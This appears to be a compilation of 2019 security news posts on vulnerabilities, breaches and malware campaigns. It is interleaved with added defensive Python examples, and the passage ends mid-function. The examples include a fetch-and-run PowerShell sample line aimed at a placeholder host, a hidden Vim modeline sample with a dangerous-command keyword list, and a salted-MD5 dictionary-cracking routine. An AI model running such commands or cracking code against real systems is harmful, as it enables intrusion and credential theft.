Patch Tuesday security updates for June 2019 also addressed two important severity vulnerabilities, tracked as CVE-2019-1040 and CVE-2019-1019, that affect Microsoft’s NTLM authentication protocol. The flaws could be exploited by remote attackers to bypass NTLM protection mechanisms and re-enable NTLM Relay attacks.

The full list of vulnerabilities addressed by Microsoft is available here.

Experts pointed out that Microsoft failed to address a flaw in SymCrypt, a core cryptographic function library currently used by Windows. The flaw could be exploited by malicious programs to trigger a denial of service condition by interrupting the encryption service for other programs.

This vulnerability was found by white hat hacker Tavis Ormandy from Google Project Zero. In line with Google’s 90-day disclosure policy, Ormandy today publicly released details and a proof-of-concept of the vulnerability.

Pierluigi Paganini

(SecurityAffairs – Microsoft Patch Tuesday, hacking)

The post Microsoft Patch Tuesday security updates for June 2019 fix 88 flaws appeared first on Security Affairs.

Vulnerability in WordPress Live Chat Plugin allows to steal and hijack sessions

Security researchers at Alert Logic have discovered a vulnerability in the WordPress Live Chat plugin that could be exploited to steal and hijack sessions.

Experts at Alert Logic have discovered a vulnerability in the popular WordPress Live Chat plugin that could be exploited by an unauthorized remote attacker to steal chat logs or manipulate chat sessions.

The vulnerability, tracked as CVE-2019-12498, is a critical authentication bypass issue (CWE-287 / OWASP Top 10 A2:2017 Broken Authentication) that affects version 8.0.32 and earlier of the plugin.

The vulnerability is caused by an improper validation check for authentication; an attacker can trigger it to access restricted REST API endpoints.

“…we uncovered a critical authentication bypass (CWE-287 / OWASP Top 10: A2: 2017-Broken Authentication) in version 8.0.32 and earlier.” reads the security advisory published by the experts. “This bypass allows an attacker to gain access to the REST API functionality without valid credentials—enabling exfiltration of chat logs and the ability to manipulate chat sessions.”

WP Live Chat Support lets site owners provide customer support and chat with visitors through their WordPress websites; over 50,000 businesses currently use this plugin.

“The restricted REST API endpoints of the affected versions of WP Live Chat are vulnerable to abuse by unauthenticated remote attackers due to a flaw in the ‘wplc_api_permission_check()’ function.” continues the advisory.


The REST API endpoints of unpatched WP Live Chat Support installs are potentially exposed to attacks carried out by unauthenticated remote attackers due to a vulnerability in the ‘wplc_api_permission_check()’ function.

“The above series of ‘register_rest_route()’ calls define those REST API endpoints which should have access restrictions due to the nature of the functionality they expose,” continues the Alert Logic research team.

“Each restricted endpoint shares the same ‘permission_callback’ function, namely the ‘wplc_api_permission_check()’ function which will be explored shortly.”

A remote attacker can exploit exposed endpoints for several malicious purposes, including:

  • stealing the entire chat history for all chat sessions,
  • modifying or deleting the chat history,
  • injecting messages into an active chat session, posing as a customer support agent,
  • forcefully ending active chat sessions, as part of a denial of service (DoS) attack.
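The advisory's point is structural: every restricted endpoint is only as protected as the single permission_callback it shares. The following added example models that pattern in Python. It is a constructed illustration of the vulnerability class (CWE-287, a check that grants access when credentials are simply absent), not the plugin's PHP code and not a reproduction of the exact defect in wplc_api_permission_check(); the route path, header name and token store are placeholders.

```python
"""Added example: the permission_callback pattern, with a check that fails
open beside one that fails closed. Constructed illustration of CWE-287, not
the plugin's code; route, header and token values are placeholders.
"""
import hmac
from dataclasses import dataclass, field
from typing import Callable, Dict, Tuple


@dataclass
class Request:
    method: str
    route: str
    headers: Dict[str, str] = field(default_factory=dict)


# Constructed credential store: per-agent API tokens a support agent would hold.
VALID_TOKENS = {"agent-7": "tok_0123456789abcdef"}


def permission_check_fails_open(req: Request) -> bool:
    """Anti-pattern: rejects only when a token is present AND wrong.
    A request carrying no token at all is treated as authorised."""
    token = req.headers.get("X-Api-Token")
    if token is None:
        return True
    return token in VALID_TOKENS.values()


def permission_check_fails_closed(req: Request) -> bool:
    """Require a token; absent, empty or mismatched values are all denied.
    hmac.compare_digest keeps the comparison constant-time."""
    token = req.headers.get("X-Api-Token", "").encode()
    return any(hmac.compare_digest(token, valid.encode()) for valid in VALID_TOKENS.values())


class RestServer:
    """Tiny stand-in for register_rest_route(): route -> (handler, permission_callback)."""

    def __init__(self) -> None:
        self.routes: Dict[str, Tuple[Callable, Callable[[Request], bool]]] = {}

    def register_rest_route(self, route: str, handler: Callable,
                            permission_callback: Callable[[Request], bool]) -> None:
        self.routes[route] = (handler, permission_callback)

    def dispatch(self, req: Request) -> Tuple[int, dict]:
        entry = self.routes.get(req.route)
        if entry is None:
            return 404, {"error": "rest_no_route"}
        handler, permission_callback = entry
        if not permission_callback(req):        # the one gate every restricted endpoint shares
            return 401, {"error": "rest_forbidden"}
        return 200, handler(req)


CHAT_LOG = [{"session": "s1", "text": "constructed sample message"}]   # stands in for stored chats


def get_chat_history(req: Request) -> dict:
    return {"history": CHAT_LOG}


def build_server(check: Callable[[Request], bool]) -> RestServer:
    server = RestServer()
    # placeholder route name, not the plugin's real namespace
    server.register_rest_route("/wplc/v1/chat-history", get_chat_history, permission_callback=check)
    return server


if __name__ == "__main__":
    anon = Request("GET", "/wplc/v1/chat-history")
    print(build_server(permission_check_fails_open).dispatch(anon)[0])    # 200: history leaks
    print(build_server(permission_check_fails_closed).dispatch(anon)[0])  # 401
```

A useful regression test for any REST registration is exactly the one in the block: call each restricted route with no credentials at all and assert on a 401, since "wrong token" and "no token" are different code paths and the second is the one that fails open here.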

Below the timeline of the vulnerability:

  • 28 May 2019 – Initial contact with vendor.
  • 29 May 2019 – Vulnerability disclosed to vendor.
  • 30 May 2019 – Vendor accepts vulnerability and begins working on a patch.
  • 31 May 2019 – Submitted to NVD; CVE assigned.
  • 31 May 2019 – New version released; confirmed no longer vulnerable.
  • 10 June 2019 – Responsible disclosure embargo lifted.

Fortunately, experts are not aware of attacks in the wild exploiting the vulnerability.

Pierluigi Paganini

(SecurityAffairs – WordPress Live Chat plugin, hacking)

The post Vulnerability in WordPress Live Chat Plugin allows to steal and hijack sessions appeared first on Security Affairs.

Customs and Border Protection (CBP) confirms hack of a subcontractor

Customs and Border Protection (CBP) revealed that photos of travelers and license plates collected at a single U.S. border point have been stolen by hackers.

Customs and Border Protection (CBP) revealed that photos of travelers and license plates collected at a single U.S. border point have been stolen as a result of a cyber attack.

The Customs and Border Protection agency did not reveal the name of the company involved in the incident. According to media outlets, hackers broke into the computer network of an unnamed subcontractor; many experts believe the incident could be linked to the hack of Perceptics.

At the end of May the company Perceptics, a leader in license plate readers (LPRs), license plate recognition systems and vehicle identification products, announced it had suffered a security breach. The attackers stole data and offered business plans, financial documents, and personal information for free on the dark web.


LPRs manufactured by Perceptics are installed at all land border crossing lanes for privately owned vehicle traffic (POV) in the United States, Canada, and for the most critical lanes in Mexico.

A hacker that goes online with the moniker ‘Boris Bullet-Dodger’ reported the hack to The Register and shared with the journalists a list of files as proof of the attack.

A Customs spokesman revealed that fewer than 100,000 people have been impacted: hackers accessed photos of travelers in vehicles entering and exiting the United States at a single land-border port of entry over a period of one and a half months.

CBP said that the stolen data are not available online or on the Dark Web.

“Initial information indicates that the subcontractor violated mandatory security and privacy protocols outlined in their contract,” reads a statement published by the CBP.

In any case, the subcontractor was not authorized to transfer copies of the images to its own infrastructure without CBP’s authorization.

Customs and Border Protection learned of the security breach on May 31, 2019; it pointed out that hackers did not compromise its network.

“The chairman of the House Homeland Security Committee, Rep. Bennie Thompson of Mississippi, noted with alarm that this is the “second major privacy breach at DHS this year.”” reported the AP.

“We must ensure we are not expanding the use of biometrics at the expense of the privacy of the American public,” he said in a statement.

Pierluigi Paganini

(SecurityAffairs – CBP, hacking)

The post Customs and Border Protection (CBP) confirms hack of a subcontractor appeared first on Security Affairs.

Security Affairs 2019-06-11 00:49:57

The MuddyWater cyber espionage group has used an updated multi-stage PowerShell backdoor in recent cyber attacks.

Security experts at Trend Micro report that the MuddyWater APT group (aka SeedWorm and TEMP.Zagros) has used an updated multi-stage PowerShell backdoor in recent cyber espionage campaigns.

The first MuddyWater campaign was observed in late 2017, when it targeted entities in the Middle East.

The experts called the campaign ‘MuddyWater’ due to the confusion in attributing a wave of attacks that took place between February and October 2017 targeting entities in Saudi Arabia, Iraq, Israel, United Arab Emirates, Georgia, India, Pakistan, Turkey, and the United States to date.

The group evolved over the years by adding new attack techniques to its arsenal.

In March 2018, experts at FireEye uncovered a massive phishing campaign conducted by the TEMP.Zagros group targeting Asia and Middle East regions from January 2018 to March 2018.

The threat actors continue to evolve their TTPs; a few weeks ago Cisco Talos attributed the recently spotted campaign tracked as “BlackWater” to the MuddyWater APT group and highlighted the usage of new anti-detection techniques.

Now, according to Trend Micro, the APT group has updated its multi-stage POWERSTATS backdoor; the experts have already observed a new variant in spear-phishing attacks aimed at a university in Jordan and the Turkish government.

“One of the campaigns sent spear-phishing emails to a university in Jordan and the Turkish government. The said legitimate entities’ sender addresses were not spoofed to deceive email recipients. Instead, the campaign used compromised legitimate accounts to trick victims into installing malware.” reads the analysis published by Trend Micro.

“Our analysis revealed that the threat actor group deployed a new multi-stage PowerShell-based backdoor called POWERSTATS v3.”

MuddyWater hackers used compromised legitimate accounts to send out spear-phishing messages containing a document embedded with a malicious macro.


The macro was used to drop a VBE file that holds a block of data containing an obfuscated PowerShell script. 

The block of data will be decoded and saved to the %PUBLIC% directory with various names and image file extensions such as .jpeg and .png. The attackers’ PowerShell code implements a custom string obfuscation and junk stubs of code to make it difficult to analyze.

Once all the strings are deobfuscated, the final backdoor code is revealed. The backdoor first gathers operating system (OS) information and saves the result to a log file that is sent back to the C&C server.

“Each victim machine will generate a random GUID number, which will be used for machine identification. Later on, the malware variant will start the endless loop, querying for the GUID-named file in a certain folder on the C&C server.” continues the analysis. “If such a file is found, it will be downloaded and executed using the Powershell.exe process.”

The hackers can launch a second-stage attack by sending specific commands to the backdoor. The malicious code is also able to install and execute other payloads, including another backdoor analyzed by Trend Micro that supports several commands, such as taking screenshots and executing commands via the cmd.exe binary.

The backdoor is also able to execute PowerShell code via the “Invoke-Expression” cmdlet.

The hackers connect to the C2 with PHP scripts that have a hardcoded token and a set of backend functions such as sc (screenshot), res (result of executed command), reg (register new victim), and uDel (self-delete after an error).

Trend Micro observed an evolution of the malicious code used by the MuddyWater group: in March and April the hackers were using the heavily obfuscated POWERSTATS v2, but in May they deployed the new POWERSTATS v3.

The following table reports some of the campaigns observed by Trend Micro in H1 2019 with the associated payloads and publicly available post-exploitation tools:

Discovery date | Method for dropping malicious code | Type of files dropped | Final payload
2019-01        | Macros                             | EXE                   | SHARPSTATS
2019-01        | Macros                             | INF, EXE              | DELPHSTATS
2019-03        | Macros                             | Base64 encoded, BAT   | POWERSTATS v2
2019-04        | Template injection                 | Document with macros  | POWERSTATS v1 or v2
2019-05        | Macros                             | VBE                   | POWERSTATS v3

It is interesting to note that the MuddyWater attackers do not use zero-day exploits in their campaigns; nevertheless, the threat actors keep evolving their TTPs to evade detection.

“While MuddyWater appears to have no access to zero-days and advanced malware variants, it still managed to compromise its targets. This can be attributed to the constant development of their schemes. Notably, the group’s use of email as an infection vector seems to yield success for their campaigns,” Trend Micro concludes. 

Pierluigi Paganini

(SecurityAffairs – MuddyWater, hacking)

The post appeared first on Security Affairs.

CVE-2019-2725 Oracle WebLogic flaw exploited in cryptojacking campaign

The CVE-2019-2725 vulnerability in Oracle WebLogic, recently addressed by the company, is being exploited in cryptojacking attacks, Trend Micro reports.

Experts at Trend Micro reported that the recently patched CVE-2019-2725 vulnerability in Oracle WebLogic is being exploited in cryptojacking attacks.

The flaw is a deserialization remote command execution vulnerability, initially exploited as a zero-day, that affects the Oracle WebLogic wls9_async and wls-wsat components.

According to the initial reports, the issue affects all WebLogic versions, including the latest one, that have the wls9_async_response.war and wls-wsat.war components enabled.

Oracle WebLogic Server is a Java EE application server developed by Oracle Corporation; it is used by numerous Java-based applications and enterprise web portals.

An attacker could exploit the vulnerability to remotely execute commands without authorization by sending a specially crafted HTTP request.

The CVE-2019-2725 flaw was patched in late April; unfortunately, a few days later threat actors started exploiting the Oracle WebLogic Server vulnerability to deliver the Sodinokibi ransomware.

After the publication of the security advisory, experts at the SANS Institute reported that the flaw was already being actively exploited in cryptojacking campaigns. Experts at Trend Micro now confirm the SANS report and add that attackers are using an interesting obfuscation technique.

The malware used in this campaign hides its malicious code in certificate files to evade detection.

CVE-2019-2725 cryptojacking

The attackers exploit the CVE-2019-2725 flaw to execute a command on the vulnerable server, and that command kicks off a series of routines.

“The purpose of the command is to perform a series of routines. First, PowerShell (PS) is used to download a certificate file from the command-and-control (C&C) server and save it under %APPDATA% using the file name cert.cer (detected by Trend Micro as Coinminer.Win32.MALXMR.TIAOODCJ.component).” reads the analysis published by Trend Micro.

“It then employs the component CertUtil, which is used to manage certificates in Windows, to decode the file.”

The attack chain starts with a PowerShell command that downloads a certificate file from the C2 server. The malicious code uses the CertUtil tool to decode the file, then executes the result with PowerShell. The downloaded file is then deleted using cmd.

The certificate file looks like a Privacy-Enhanced Mail (PEM) format certificate, but instead of X.509 data its body decodes to a PowerShell command.

“One interesting characteristic of the downloaded certificate file is that it requires that it be decoded twice before the PS command is revealed, which is unusual since the command from the exploit only uses CertUtil once.” continues the experts. “There is also the possibility that the certificate file we downloaded is different from the file that was actually intended to be downloaded by the remote command, perhaps because it is continuously being updated by the threat actors.”
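A quick way to tell such a file from a real certificate, added here as an example and not code from the Trend Micro write-up or from the miner's loader: parse the PEM block the way certutil -decode would, keep peeling base64 layers while the result is still base64 text (this is what handles the double encoding described above), and check whether the innermost payload is DER (a certificate starts with the ASN.1 SEQUENCE tag 0x30) or something else such as a PowerShell command. Both sample files are constructed by the script; the hidden command points at a placeholder host and is never executed.

```python
import base64
import binascii
import re

PEM_RE = re.compile(rb"-----BEGIN ([A-Z ]+)-----\s*(.*?)\s*-----END \1-----", re.DOTALL)
B64_RE = re.compile(rb"[A-Za-z0-9+/]+=*")


def pem_body(data):
    """Decode the first PEM block in `data` the way `certutil -decode` would; None if there is none."""
    m = PEM_RE.search(data)
    if not m:
        return None
    try:
        return base64.b64decode(b"".join(m.group(2).split()), validate=True)
    except binascii.Error:
        return None


def is_printable(blob):
    """True when at least 95% of the bytes are printable ASCII or whitespace (heuristic)."""
    if not blob:
        return False
    ok = sum(1 for b in blob if 32 <= b < 127 or b in (9, 10, 13))
    return ok / len(blob) > 0.95


def try_peel(blob):
    """Strip one base64 layer if `blob` is base64 text whose decoding is DER or readable text."""
    stripped = b"".join(blob.split())
    if len(stripped) < 8 or len(stripped) % 4 or not B64_RE.fullmatch(stripped):
        return None
    try:
        inner = base64.b64decode(stripped, validate=True)
    except binascii.Error:
        return None
    if inner.startswith(b"\x30") or is_printable(inner):
        return inner
    return None


def inspect_certificate(data, max_rounds=5):
    """Return (verdict, rounds, payload): verdict is "der" for ASN.1 data (a real certificate
    starts with the SEQUENCE tag 0x30), "text" for anything else, "not-pem" if no block was found;
    rounds is how many base64 layers were removed."""
    payload = pem_body(data)
    if payload is None:
        return ("not-pem", 0, b"")
    rounds = 1
    while rounds < max_rounds and not payload.startswith(b"\x30"):
        inner = try_peel(payload)
        if inner is None:
            break
        payload, rounds = inner, rounds + 1
    return ("der" if payload.startswith(b"\x30") else "text", rounds, payload)


def wrap_as_pem(payload, layers=1):
    """Sample builder: wrap `payload` in `layers` rounds of base64 inside CERTIFICATE armour."""
    body = payload
    for _ in range(layers):
        body = base64.b64encode(body)
    lines = [body[i:i + 64] for i in range(0, len(body), 64)]
    return b"-----BEGIN CERTIFICATE-----\n" + b"\n".join(lines) + b"\n-----END CERTIFICATE-----\n"


# Constructed samples: a DER-looking stub (not a valid certificate) and a doubly wrapped
# PowerShell one-liner pointing at a placeholder host.
REAL_CERT = wrap_as_pem(b"\x30\x82\x01\x00" + b"\x00" * 20)
FAKE_CERT = wrap_as_pem(b"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/update.ps1')", layers=2)

if __name__ == "__main__":
    for name, blob in (("real", REAL_CERT), ("fake", FAKE_CERT)):
        verdict, rounds, payload = inspect_certificate(blob)
        print("%s: %s after %d decode round(s): %r" % (name, verdict, rounds, payload[:48]))
```

Run over every .cer found under %APPDATA%, a "text" verdict with two or more rounds is exactly the pattern Trend Micro describes; a "der" verdict after one round is what a legitimate certificate produces.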

The command in the certificate file is used by the crooks to download and execute another PowerShell script in memory. That script downloads and executes multiple files, including Sysupdate.exe (Monero miner), Config.json (configuration file for the miner), Networkservice.exe (likely used for propagation and exploitation of WebLogic), Update.ps1 (the PowerShell script run in memory), Sysguard.exe (watchdog for the miner process), and Clean.bat (deletes other components).

Experts noticed that the update.ps1 file containing the decoded certificate content is replaced with the new update.ps1, and a scheduled task is created to execute the new PowerShell script every 30 minutes.

The idea of hiding malware in a certificate is not new: experts at Sophos explored this technique in a proof of concept late last year.

“However, oddly enough, upon execution of the PS command from the decoded certificate file, other malicious files are downloaded without being hidden via the certificate file format mentioned earlier.” concludes Trend Micro. “This might indicate that the obfuscation method is currently being tested for its effectiveness, with its expansion to other malware variants pegged at a later date,”

Pierluigi Paganini

(SecurityAffairs – CVE-2019-2725, Oracle WebLogic)

The post CVE-2019-2725 Oracle WebLogic flaw exploited in cryptojacking campaign appeared first on Security Affairs.

CVE-2019-12735 – opening a specially crafted file in Vim or Neovim Editor could compromise your Linux system

Bad news for Linux users: a flaw tracked as CVE-2019-12735 allows attackers to compromise their systems by tricking them into opening a specially crafted file in the Vim or Neovim editor.

Security expert Armin Razmjou has recently found a high-severity vulnerability (CVE-2019-12735) in the Vim and Neovim command-line text editors.

The vulnerability, tracked as CVE-2019-12735, is classified as an arbitrary OS command execution issue. Vim ships pre-installed in most Linux distributions, and Neovim is a popular fork available in their package repositories.

“Vim before 8.1.1365 and Neovim before 0.3.6 are vulnerable to arbitrary code execution via modelines by opening a specially crafted text file.” reads the security advisory published by the expert.

Vim is a highly configurable text editor for efficiently creating and changing any kind of text, including documents and scripts.

Neovim is a fork of Vim with roughly 30% less source code; its stated vision is to enable new applications without compromising Vim’s traditional roles, while enhancing the user experience.

The vulnerability affects the way the editor handles the “modelines” feature. A modeline allows a file to specify custom editor options near its start or end (e.g. /* vim: set textwidth=80 tabstop=8: */). The feature is enabled by default and applies to all file types.

Only a subset of options is allowed in modelines, and if an expression is included in an option value it is evaluated in a sandbox.

Razmjou explained that it is nonetheless possible to construct a modeline that executes code outside the sandbox.

“However, the :source! command (with the bang [!] modifier) can be used to bypass the sandbox. It reads and executes commands from a given file as if typed manually, running them after the sandbox has been left.” continues the expert.

The expert demonstrated that by tricking a victim into opening a specially crafted file with Vim or Neovim it is possible to silently execute commands on their Linux system and remotely take it over.

Razmjou published two proof-of-concept exploits to the public, one of which allows a remote attacker to gain access to a reverse shell.

“This PoC outlines a real-life attack approach in which a reverse shell is launched once the user opens the file. To conceal the attack, the file will be immediately rewritten when opened.” continues the post. “Also, the PoC uses terminal escape sequences to hide the modeline when the content is printed with cat. (cat -v reveals the actual content.)”
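A triage script for incoming text files, added here as an example and not the researcher's PoC or Vim code: Vim only honours modelines in the first and last 'modelines' lines of a file (5 by default), so the scanner looks only there for the vim:/vi:/ex: markers, reports a modeline carrying source!, :! or similar (a heuristic keyword list chosen for this example, not a complete one), and reports ESC bytes, which are what let the PoC hide the modeline from cat. The sample files are constructed below; the "hidden" one is illustrative and does not by itself reproduce the sandbox escape.

```python
import re

# A modeline is recognised by "vim:", "vi:" or "ex:" at the start of the line or after whitespace.
MODELINE_RE = re.compile(r"(?:^|\s)(?:vim?|ex):", re.IGNORECASE)
# Tokens that have no business in a modeline (heuristic list chosen for this example).
DANGEROUS = ("source!", "so!", ":!", "system(", "execute(", "libcall(")


def scan_modelines(text, modelines=5):
    """Return [(line_number, [tags])] for suspicious lines in the region Vim actually reads.

    Vim only evaluates modelines within the first and last `modelines` lines (default 5),
    so a marker in the middle of a long file is ignored, exactly as the editor ignores it.
    """
    lines = text.split("\n")          # not splitlines(): a CR inside a line stays part of it
    if lines and lines[-1] == "":
        lines.pop()
    n = len(lines)
    candidates = sorted(set(range(min(modelines, n))) | set(range(max(0, n - modelines), n)))
    findings = []
    for i in candidates:
        line = lines[i]
        tags = []
        if "\x1b" in line:
            tags.append("escape sequence")   # can hide the rest of the line from `cat`
        m = MODELINE_RE.search(line)
        if m:
            hits = [k for k in DANGEROUS if k in line[m.end():]]
            tags.append("dangerous modeline (%s)" % ", ".join(hits) if hits else "modeline")
        if tags:
            findings.append((i + 1, tags))
    return findings


# Constructed samples. The "hidden" file is illustrative only: it is not the researcher's PoC
# and the modeline it carries does not by itself reproduce the sandbox escape.
SAFE_FILE = "/* vim: set textwidth=80 tabstop=8: */\nint main(void) { return 0; }\n"
HIDDEN_FILE = (
    "Quarterly notes\n"
    "nothing to see here\n"
    " vim: set ft=c :source! ./payload.vim:\r\x1b[2K\n"   # CR + erase-line leaves a blank line on a terminal
)
LONG_FILE = "\n".join(["x"] * 6 + [" vim: set ts=4:"] + ["y"] * 6) + "\n"

if __name__ == "__main__":
    for name, content in (("safe", SAFE_FILE), ("hidden", HIDDEN_FILE), ("long", LONG_FILE)):
        print(name, scan_modelines(content))
```

On the editor side, :set modeline? shows whether the feature is on, and set nomodeline (or set nomodelineexpr on a patched build) in the vimrc is the mitigation the researcher recommends; cat -v, as the post notes, makes the escape sequences visible.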

Below is the video PoC of the attack:

CVE-2019-12735 Linux flaw

The Vim and Neovim development teams have already released security updates that address CVE-2019-12735: Vim patch 8.1.1365 and Neovim v0.3.6.

The expert also suggests to:

  • disable modelines feature,
  • disable “modelineexpr” to disallow expressions in modelines,
  • use the “securemodelines” plugin, a secure alternative to Vim modelines.

Below is the timeline of the flaw:

  • 2019-05-22 Vim and Neovim maintainers notified
  • 2019-05-23 Vim patch released
  • 2019-05-29 Neovim patch released
  • 2019-06-05 CVE ID CVE-2019-12735 assigned

Pierluigi Paganini

(SecurityAffairs – CVE-2019-12735, hacking)

The post CVE-2019-12735 – opening a specially crafted file in Vim or Neovim Editor could compromise your Linux system appeared first on Security Affairs.

Shanghai Jiao Tong University data leak – 8.4TB in email metadata exposed

Security expert discovered an exposed database belonging to Shanghai Jiao Tong University containing 8.4TB in email metadata.

Cloudflare Director of Trust & Safety Justin Paine discovered an unprotected database owned by Shanghai Jiao Tong University that was exposed online.

Shanghai Jiao Tong University is considered one of the most prominent academic institutions in China.

The exposed database, containing 8.4TB of email metadata, was discovered on May 22, 2019, through a Shodan search.

“While searching Shodan, I recently discovered an ElasticSearch database without any authentication. This database contained metadata related to a huge amount of emails. It was eventually confirmed that this server and the email metadata was controlled by a large university located in China.  ” wrote the expert on the rainbowtabl.es website. “9.5 billion rows of data which translates to 8.4TB of data.”

The unprotected database was active at the time of discovery: it contained 9.5 billion rows, and its size increased from 7TB on May 23 to 8.4TB on May 24.

Shanghai Jiao Tong University

The email metadata was generated by the popular open-source email solution Zimbra.

Based on the metadata, the expert was able to locate all emails sent or received by a specific individual. The exposed data also included the IP address and user agent of the person checking their email.

Paine reported the discovery to the University the day after finding it, and the institution secured the archive in less than 24 hours.

Below is the timeline of the leak:

  • May 22, 2019 – Open ElasticSearch database discovered.
  • May 23, 2019 – Shanghai Jiao Tong University notified.
  • May 24, 2019 – ElasticSearch database secured.

Pierluigi Paganini

(SecurityAffairs – data leak, hacking)

The post Shanghai Jiao Tong University data leak – 8.4TB in email metadata exposed appeared first on Security Affairs.

Retro video game website Emuparadise suffered a data breach

The retro video game website Emuparadise has revealed that it suffered a data breach in April 2018 that exposed 1.1 million accounts.

Emuparadise is a website that offered tons of ROMs, ISOs and retro video games; users could download and play them with an emulator or play them directly in the web browser.

The security breach occurred in April 2018 and exposed account information for approximately 1.1 million Emuparadise forum members.

Since August 2018, Emuparadise no longer hosts game ROMs, but it continued to offer information on retro video games and operated community forums.

Emuparadise hack

Over the weekend, some Emuparadise forum members reported receiving data breach notifications from the popular services Have I Been Pwned and HackNotice. The notices inform them that their data was exposed in the breach that occurred in April 2018.

The notice issued by Have I Been Pwned states that 1,131,229 accounts from the Emuparadise forums were exposed in an incident that occurred in April 2018. The forums run on vBulletin, a very popular platform whose older versions are known to be affected by several vulnerabilities.

HIBP received the data from dehashed.com on June 9th, 2019; the exposed info includes email addresses, IP addresses, usernames and passwords stored as salted MD5 hashes.

“In April 2018, the self-proclaimed “biggest retro gaming website on earth”, Emuparadise, suffered a data breach.” states Have I Been Pwned. “The compromised vBulletin forum exposed 1.1 million email addresses, IP address, usernames and passwords stored as salted MD5 hashes.”
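Why "salted MD5" is cold comfort for the affected users, shown with an added example that uses none of the breached data: the classic vBulletin 3.x/4.x scheme stores md5(md5(password) + salt) with a short per-user salt (an assumption about which scheme these older forums used; the page only says older vBulletin), and a small wordlist recovers such hashes at the full speed of two MD5 calls per guess. The users, salts, passwords and wordlist below are constructed, and the closing benchmark contrasts the scheme with a deliberately slow KDF.

```python
import hashlib
import time


def vb_hash(password, salt):
    """Classic vBulletin (3.x/4.x) password hash: md5(md5(password) + salt), hex encoded."""
    inner = hashlib.md5(password.encode("utf-8")).hexdigest()
    return hashlib.md5((inner + salt).encode("utf-8")).hexdigest()


# Constructed "leaked" rows: (username, hash, salt). Salts are short random-looking strings
# as in vBulletin; none of these users, salts or passwords come from the real breach.
_SAMPLE = {
    "retro_fan": ("password1", "k3j"),
    "sega_kid": ("sonic1991", "Qz9"),
    "admin": ("c0rrect-h0rse-b4ttery", "aB1"),
}
LEAK = [(user, vb_hash(pw, salt), salt) for user, (pw, salt) in _SAMPLE.items()]

# A tiny wordlist standing in for the multi-million-entry lists crackers actually use.
WORDLIST = ["123456", "password", "password1", "sonic1991", "mario64", "qwerty", "letmein"]


def crack(rows, wordlist):
    """Dictionary attack: return ({user: password} for every row whose hash matches a guess,
    number of hash computations spent). The salt only forces one pass per user; it does not
    slow any individual guess down."""
    recovered, work = {}, 0
    for user, digest, salt in rows:
        for guess in wordlist:
            work += 1
            if vb_hash(guess, salt) == digest:
                recovered[user] = guess
                break
    return recovered, work


def rate(fn, seconds=0.2):
    """Rough calls-per-second figure for `fn`, used only to contrast fast and slow schemes."""
    n, end = 0, time.perf_counter() + seconds
    while time.perf_counter() < end:
        fn()
        n += 1
    return n / seconds


if __name__ == "__main__":
    recovered, work = crack(LEAK, WORDLIST)
    print("recovered:", recovered, "after", work, "guesses")
    fast = rate(lambda: vb_hash("guess", "k3j"))
    slow = rate(lambda: hashlib.pbkdf2_hmac("sha256", b"guess", b"k3j", 100_000))
    print("salted MD5: %.0f/s, PBKDF2-SHA256 (100k rounds): %.0f/s" % (fast, slow))
```

The salt defeats precomputed tables and stops one crack from unlocking every user with the same password, which is all it was ever meant to do; any account whose password appears in a common wordlist should be treated as compromised.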

At the time of writing, it is not known how DeHashed obtained the huge trove of data.

Experts pointed out that Emuparadise data are offered for sale in the cybercrime underground and on hacking forums since early 2019.

Pierluigi Paganini

(SecurityAffairs – Emuparadise, hacking)

The post Retro video game website Emuparadise suffered a data breach appeared first on Security Affairs.

Microsoft warns of spam campaign exploiting CVE-2017-11882 flaw

Microsoft is warning of an active spam campaign targeting European users that leverages an exploit to infect victims simply by opening the attachment.

Microsoft issued a warning on Friday about an ongoing spam campaign that is targeting European users. The spam messages carry weaponized RTF documents that can infect users with malware without any further interaction beyond opening the attachment.

Microsoft exploit RTF attachment

The spam messages are sent in various European languages, and the threat actors are exploiting the Microsoft Office and WordPad vulnerability CVE-2017-11882. The tech giant published a series of tweets warning of the spam campaign:

“In the new campaign, the RTF file downloads and runs multiple scripts of different types (VBScript, PowerShell, PHP, others) to download the payload. The backdoor payload then tries to connect to a malicious domain that’s currently down.” warns Microsoft.

The CVE-2017-11882 flaw is a memory-corruption issue that, when disclosed, affected all versions of Microsoft Office released in the previous 17 years, including Microsoft Office 365. The vulnerability can be triggered on all versions of the Windows operating system, including the Windows 10 Creators Update.

The vulnerability affects the Office component EQNEDT32.EXE (Microsoft Equation Editor), which is responsible for inserting and editing equations (OLE objects) in documents.

The component fails to properly handle objects in memory, a bug that can be exploited by an attacker to execute malicious code in the context of the logged-in user.
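For mail-gateway triage, added here as an example and not Microsoft's detection logic: RTF embeds OLE objects as {\object ... {\*\objclass Name}{\*\objdata <hex>}}, so a scanner can pull the declared class and the hex object data out of every \object group and flag the Equation Editor class whether it is named in \objclass or only present inside the OLE stream (samples that omit \objclass are a common evasion). The three RTF documents are constructed, the object data is a placeholder header, and no exploit is included.

```python
import re

OBJCLASS_RE = re.compile(rb"\\objclass\s*([^\s\\{}]+)")
OBJDATA_RE = re.compile(rb"\\objdata\s*([0-9a-fA-F\s]+)")

# Indicators of an Equation Editor object inside the decoded OLE data.
EQUATION_MARKERS = (
    ("Equation.3 class name", b"Equation.3"),
    ("Equation.2 class name", b"Equation.2"),
    ("Equation Native stream", "Equation Native".encode("utf-16-le")),
    # CLSID {0002CE02-0000-0000-C000-000000000046} of Equation Editor 3.0, as stored on disk (little-endian).
    ("Equation.3 CLSID", bytes.fromhex("02ce020000000000c000000000000046")),
)


def rtf_groups(rtf, marker=rb"\object"):
    """Yield every brace-delimited group that opens with `marker`, honouring escaped braces."""
    for m in re.finditer(rb"\{" + re.escape(marker) + rb"(?![A-Za-z])", rtf):
        depth, i = 0, m.start()
        while i < len(rtf):
            c = rtf[i:i + 1]
            if c == b"\\":
                i += 2            # skip the escaped character ("\{", "\}" or a control word's first letter)
                continue
            if c == b"{":
                depth += 1
            elif c == b"}":
                depth -= 1
                if depth == 0:
                    yield rtf[m.start():i + 1]
                    break
            i += 1


def decode_objdata(group):
    """Return the bytes of the group's \\objdata hex blob, or b"" if absent or malformed."""
    m = OBJDATA_RE.search(group)
    if not m:
        return b""
    hexdata = b"".join(m.group(1).split())
    hexdata = hexdata[: len(hexdata) - len(hexdata) % 2]
    try:
        return bytes.fromhex(hexdata.decode("ascii"))
    except ValueError:
        return b""


def scan_rtf(rtf):
    """Return one dict per embedded object: its declared class, whether it looks like an
    Equation Editor object and the evidence found."""
    results = []
    for group in rtf_groups(rtf):
        cm = OBJCLASS_RE.search(group)
        objclass = cm.group(1).decode("latin-1") if cm else None
        data = decode_objdata(group)
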